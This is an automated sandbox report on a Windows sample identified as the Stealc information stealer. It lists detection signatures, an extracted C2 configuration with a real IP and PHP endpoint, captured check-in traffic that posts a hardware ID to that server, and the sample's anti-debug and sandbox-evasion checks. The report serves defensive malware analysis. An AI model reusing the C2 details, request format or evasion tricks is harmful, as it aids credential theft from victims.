Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532619
MD5:7299a751b9b88863206dd5259f551f8e
SHA1:bebfc704d946a2b845a05beb83a6960ad7aefba2
SHA256:613b4f35bfac7662559bd5c36e06493e60463f11d443ddd8d334bd361ea8d969
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7299A751B9B88863206DD5259F551F8E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1730271213.00000000050F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7480JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7480JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.1c0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-13T18:59:08.768360+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.1c0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_001CC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_001C7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_001C9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_001C9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_001D8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001D38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001D4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_001CDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_001CE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_001CED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_001D4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001CDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_001CBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001CF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001D3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001C16D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKEHCAKFBFHJKEHCFIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 43 33 46 42 30 31 46 36 42 41 31 39 30 34 36 36 35 39 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 2d 2d 0d 0a Data Ascii: ------JJJKEHCAKFBFHJKEHCFIContent-Disposition: form-data; name="hwid"87C3FB01F6BA1904665954------JJJKEHCAKFBFHJKEHCFIContent-Disposition: form-data; name="build"doma------JJJKEHCAKFBFHJKEHCFI--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_001C4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKEHCAKFBFHJKEHCFIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 43 33 46 42 30 31 46 36 42 41 31 39 30 34 36 36 35 39 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 2d 2d 0d 0a Data Ascii: ------JJJKEHCAKFBFHJKEHCFIContent-Disposition: form-data; name="hwid"87C3FB01F6BA1904665954------JJJKEHCAKFBFHJKEHCFIContent-Disposition: form-data; name="build"doma------JJJKEHCAKFBFHJKEHCFI--
                Source: file.exe, 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1771323751.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1771323751.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1771323751.000000000150D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1771323751.00000000014D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php-
                Source: file.exe, 00000000.00000002.1771323751.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?M9
                Source: file.exe, 00000000.00000002.1771323751.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpRL
                Source: file.exe, 00000000.00000002.1771323751.00000000014D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy
                Source: file.exe, 00000000.00000002.1771323751.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/rosoft
                Source: file.exe, 00000000.00000002.1771323751.000000000148E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37e

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004AD10D0_2_004AD10D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005109C40_2_005109C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005989960_2_00598996
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047A1AF0_2_0047A1AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005902000_2_00590200
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059A45F0_2_0059A45F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042BC080_2_0042BC08
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059BDAF0_2_0059BDAF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00596E550_2_00596E55
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058E6BB0_2_0058E6BB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043CF2A0_2_0043CF2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00503FE90_2_00503FE9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058AF900_2_0058AF90
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 001C45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: ncanagua ZLIB complexity 0.9948477909482759
                Source: file.exe, 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1730271213.00000000050F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_001D9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_001D3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\YFNC4379.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1819136 > 1048576
                Source: file.exeStatic PE information: Raw size of ncanagua is bigger than: 0x100000 < 0x196000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.1c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ncanagua:EW;tdiayxtm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ncanagua:EW;tdiayxtm:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001D9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c2eb5 should be: 0x1cbccf
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: ncanagua
                Source: file.exeStatic PE information: section name: tdiayxtm
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060E076 push 2FDB0400h; mov dword ptr [esp], edi0_2_0060E07F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060E076 push eax; mov dword ptr [esp], 70502E86h0_2_0060E0FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060E076 push eax; mov dword ptr [esp], 66C9C3A9h0_2_0060E213
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001DB035 push ecx; ret 0_2_001DB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A9008 push 30E78FAFh; mov dword ptr [esp], edi0_2_005A9078
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051A82D push 1B8B3C20h; mov dword ptr [esp], ecx0_2_0051A84B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051A82D push ecx; mov dword ptr [esp], 76F64100h0_2_0051A851
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051A82D push 3452E328h; mov dword ptr [esp], eax0_2_0051A96E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051A82D push ecx; mov dword ptr [esp], edi0_2_0051A972
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051A82D push 7A3D8EA4h; mov dword ptr [esp], esi0_2_0051A9AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C30C4 push edx; mov dword ptr [esp], ebx0_2_005C30C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084F1B8 push ecx; mov dword ptr [esp], 79F7250Fh0_2_0084F1F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084F1B8 push 72308E51h; mov dword ptr [esp], edx0_2_0084F217
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084F1B8 push 601113A0h; mov dword ptr [esp], edx0_2_0084F23D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084F1B8 push 37641F46h; mov dword ptr [esp], ebx0_2_0084F290
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084F1B8 push 30ABC673h; mov dword ptr [esp], edx0_2_0084F2CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004AD10D push esi; mov dword ptr [esp], edi0_2_004AD150
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004AD10D push 7C893702h; mov dword ptr [esp], eax0_2_004AD166
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004AD10D push ebp; mov dword ptr [esp], esi0_2_004AD1B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004AD10D push edi; mov dword ptr [esp], edx0_2_004AD2C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004AD10D push esi; mov dword ptr [esp], ebx0_2_004AD2CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672134 push edi; mov dword ptr [esp], ebx0_2_0067215E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005109C4 push 577301C9h; mov dword ptr [esp], ecx0_2_005109E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005109C4 push 6FCA791Ch; mov dword ptr [esp], edx0_2_00510A3E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066A9F1 push eax; mov dword ptr [esp], ebp0_2_0066A9FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066A9F1 push ecx; mov dword ptr [esp], eax0_2_0066ABA5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066A9F1 push 04CDC2ABh; mov dword ptr [esp], edx0_2_0066ABB2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00598996 push 74928007h; mov dword ptr [esp], eax0_2_005989B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00598996 push esi; mov dword ptr [esp], 54AB5B63h0_2_00598A0D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00598996 push 65AE2700h; mov dword ptr [esp], edx0_2_00598A25
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00598996 push 21367672h; mov dword ptr [esp], eax0_2_00598A87
                Source: file.exeStatic PE information: section name: ncanagua entropy: 7.954392600986758

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001D9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13509
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59FDA7 second address: 59FDAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59FDAD second address: 59FDB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A0000 second address: 5A0034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FBE44C971B6h 0x0000000c popad 0x0000000d push edi 0x0000000e jmp 00007FBE44C971C6h 0x00000013 pop edi 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007FBE44C971BCh 0x0000001d jc 00007FBE44C971B6h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A0187 second address: 5A019B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44689660h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A019B second address: 5A019F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A019F second address: 5A01A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A01A5 second address: 5A01AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2EF8 second address: 5A2EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2EFD second address: 5A2F02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2F56 second address: 5A2F60 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBE4468965Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
